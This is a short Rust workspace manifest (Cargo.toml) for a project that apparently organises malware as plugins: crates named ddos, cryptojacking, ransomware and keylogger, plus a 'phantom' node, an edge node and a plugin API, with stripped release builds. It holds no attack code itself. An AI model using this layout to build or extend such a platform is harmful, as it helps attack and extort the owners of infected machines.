[workspace]
resolver = "2"
members = [
    # Core infrastructure
    "crates/shared/protocol",
    "crates/shared/plugin_api",

    
    # Node applications
    "crates/nodes/phantom",
    
    # Standalone tools
    "crates/tools/dns_signer",
    
    # Plugins
    "crates/nodes/edge",
    "crates/plugins/ddos",
    "crates/plugins/cryptojacking",
    "crates/plugins/ransomware",
    "crates/plugins/keylogger",
]

[profile.release]
strip = true
opt-level = 3
